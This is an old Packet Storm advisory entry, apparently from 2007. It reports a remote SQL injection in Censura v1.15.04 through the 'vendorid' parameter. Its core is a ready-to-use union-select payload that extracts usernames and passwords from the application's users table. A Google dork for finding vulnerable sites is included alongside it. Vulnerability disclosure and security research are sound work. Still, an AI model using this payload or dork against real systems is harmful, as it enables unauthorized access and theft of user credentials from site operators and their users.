censura-sql.txt

2007-05-04T00:00:00
ID PACKETSTORM:56458
Type packetstorm
Reporter cyber-security.org
Modified 2007-05-04T00:00:00

Description

                                        
                                            `==============================================  
  
Censura v1.15.04 (vendorid) Remote SQL Injection  
  
==============================================  
  
Found: Cyber-Security.org  
  
==============================================  
  
Exploit:  
censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/  
  
==============================================  
  
google dork: "Powered by: Censura"  
  
vendor: http://www.censura.info/   
  
==============================================  
  
`